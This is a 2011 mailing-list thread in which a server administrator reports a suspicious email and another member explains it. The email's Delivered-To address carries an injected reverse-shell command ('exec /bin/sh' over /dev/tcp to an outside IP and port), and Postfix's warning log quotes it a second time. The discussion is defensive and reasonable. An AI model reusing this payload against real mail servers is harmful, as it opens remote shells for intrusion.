11 Feb
2011
11 Feb
'11
11:22 a.m.
No worries,
Reading about attempted exploits like this is often helpful for people, as
it shows them that there is a very real threat out there to servers that are
not up to date. I also find it interesting to see what they get up to these
days...
Daniel
On 11 February 2011 11:13, Alastair Sherringham <sherringham(a)gmail.com>wrote;wrote:
Thanks. All seems OK as far as I can see (AIDE check
etc.) and I am up
to date with security. I like to put this sort of thing in the open
and ask, at least if it's "unusual" (to me). Thanks for the follow-up.
On 11 February 2011 11:07, Daniel Case <danielcase10(a)gmail.com> wrote:
It seems the user was trying to get a shell
delivered to there TCP
stream. I
have heard of an exploit like this, it was
plugged quite quickly though
so
as long as you are up to date you should be
fine.
By the looks of it postfix blocked it as an illegal address so I wouldn't
worry too much, it will have delivered it as a normal email :)
Daniel
On 11 February 2011 09:29, Alastair Sherringham <sherringham(a)gmail.com>
wrote:
--
Alastair Sherringham
http://www.sherringham.net
I received an interesting email today. I only noticed because I had
logged in SSH and got the "you have new email" message. Reading via
"mail", I see :
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295
1>&0 2>&0"(a)calliope.bitfolk
Obviously some sort of possible exploit. The IP address 87.106.250.176
is Germany (1&1 Internet).
Postfix reported :
warning: 36FE51381A3: address with illegal extension: root+:|exec
/bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0
But it was delivered. I hope nothing bad has happened. I am running
AIDE as we speak and digging around).
Cheers,
--
Alastair Sherringham
http://www.sherringham.net
_______________________________________________
users mailing list
users(a)lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/users